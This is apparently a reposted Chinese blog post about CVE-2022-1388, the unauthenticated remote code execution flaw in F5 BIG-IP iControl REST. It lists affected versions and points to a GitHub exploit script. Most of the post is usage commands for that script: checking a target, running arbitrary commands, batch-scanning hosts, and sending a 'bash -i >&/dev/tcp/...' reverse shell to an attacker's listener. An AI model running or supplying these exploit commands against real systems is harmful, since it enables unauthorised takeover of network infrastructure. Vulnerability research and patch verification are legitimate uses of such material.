CVE-2022-1388:F5 BIG-IP iControl REST RCE
CVE-2022-1388:F5 BIG-IP iControl REST RCE
Al1ex
发布于 2022-06-23 15:52:30
发布于 2022-06-23 15:52:30
文章前言
本篇文章本来打算时三天之前发的,但是由于文章排期所以到了今天了,略有延迟,本篇文章主要侧重于CVE-2022-1388的检测与利用
影响范围
- F5 BIG-IP 11.6.1 - 11.6.5
- F5 BIG-IP 12.1.0 - 12.1.6
- F5 BIG-IP 13.1.0 - 13.1.4
- F5 BIG-IP 14.1.0 - 14.1.4
- F5 BIG-IP 15.1.0 - 15.1.5
- F5 BIG-IP 16.1.0 - 16.1.2
漏洞描述
CVE-2022-1388漏洞由F5内部发现并披露,此漏洞允许未经身份验证的攻击者通过管理端口和/或自身IP地址对BIG-IP系统进行网络访问,以执行任意系统命令、创建或删除文件或禁用服务,算的上是CVE-2021-22986的后续
项目地址
https://github.com/Al1ex/CVE-2022-1388
基本使用
python3 CVE_2022_1388.py
漏洞检测
python3 CVE_2022_1388.py -v true -u https://192.168.17.200
命令执行
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami
批量检测
python3 CVE_2022_1388.py -s true -f check.txt
反弹shell
python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"
参考链接
https://support.f5.com/csp/article/K23605346
https://mp.weixin.qq.com/s/OC52LIGB5NTITy9EjvKdaw
https://twitter.com/jas502n/status/1523611433938059265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-05-12,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
相关产品与服务
脆弱性检测服务
脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。